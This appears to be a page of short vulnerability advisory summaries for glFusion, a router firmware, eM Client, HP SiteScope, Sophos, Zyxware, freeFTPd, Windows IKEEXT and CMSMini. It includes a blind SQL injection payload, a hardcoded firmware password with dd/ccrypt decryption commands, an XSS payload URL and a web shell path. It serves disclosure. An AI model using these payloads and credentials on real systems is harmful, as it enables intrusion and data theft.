glFusion is affected by SQL Injection vulnerability in version 1.3.0. Example PoC url is as follows: Blind SQL Injection Vulnerability http://example.com/mediagallery/search.php POST - param: cat_id='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
The file provided to the end-user in order to make a backup copy of the device configuration, is encrypted with a hardcoded password. The device firmware creates the configuration file in three specific steps, as shown below: - Collect the configuration data to backup - Encrypt entries with the hardcoded password "sw5-superman" - Create the file header through the tool "imghdr". An attacker ables to get an encrypted configuration file could decrypt its contents with the following command: sh# dd if=config-file of=config-file-no-header bs=84 skip=1 sh# ccrypt -d -K sw5-superman config-file-no-header. Decrypted file contains sensitive information that an attacker could use in order to compromise the target device (e.g., admin password and WPA passphrase). Furthermore, an attacker can craft a own configuration file, encrypt it with the hardcoded password, append at the beginning of file a valid header and finally upload the new configuration to the target device without authentication, exploiting the "Authentication bypass" issue described inside this advisory. An authenticated attacker can exploit the "Ping Test" feature exposed inside the page "/System_Check.htm", in order to execute arbitrary commands inside the device, with root privileges. The page "/System_Check.htm" does not require authentication in order to be accessed. This page exposes the "Ping Test" feature, which can be used to execute arbitrary commands inside the device, with root privileges.
eM Client for Windows is vulnerable to stored XSS. An attacker can send an email with a malicious payload to the victim, which when opened or viewed, will execute the payload and cause an alert box to appear. The injection point is the body of the email.
This module exploits a code execution flaw in HP SiteScope. The vulnerability exists on the opcactivate.vbs script, which is reachable from the APIBSMIntegrationImpl AXIS service, and uses WScript.Shell.run() to execute cmd.exe with user provided data. Note which the opcactivate.vbs component is installed with the (optional) HP Operations Agent component. The module has been tested successfully on HP SiteScope 11.20 (with HP Operations Agent) over Windows 2003 SP2.
Multiple vulnerabilities have been found in Sophos Web Protection Appliance that could allow an unauthenticated remote attacker to execute arbitrary OS commands and escalate privileges to gain root permissions within the appliance. The OS command injection vulnerability can be exploited by remote unauthenticated attackers that can reach the web interface of the appliance. The privilege escalation vulnerability allows an attacker that already gained code execution on the appliance to escalate privileges from the operating system user 'spiderman' to 'root'.
Multiple SQL Injection and XSS vulnerabilities were found in Zyxware Health Monitoring System. The vulnerable parameters are strDiseaseName, opt, rightContent, mapheight, mapwidth, imageheight. An example of XSS payload is http://localhost/healthmonitor/maps/khmheading.php?imageheight=0&imagePadding=%22%3Cscript%3E%20alert%28%27XSS%27%29%3C/script%3E
This module exploits a SEH stack-based buffer overflow in freeFTPd Server PASS command version 1.0.10. credit goes to Wireghoul.
This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules' (IKEEXT) service which runs as SYSTEM, and starts automatically in default installations of Vista-Win8. It requires an insecure bin path to plant the DLL payload.
This vulnerability allows an attacker to gain total access and control in the CMS by sending a malicious POST request.
CMSMini is vulnerable to file upload and CSRF. An attacker can upload a malicious file and activate it using CSRF. The uploaded shell can be accessed at http://[target/IP]/cmsmini/pages/cmd.php. An attacker can also delete the page using CSRF.
Services By CQR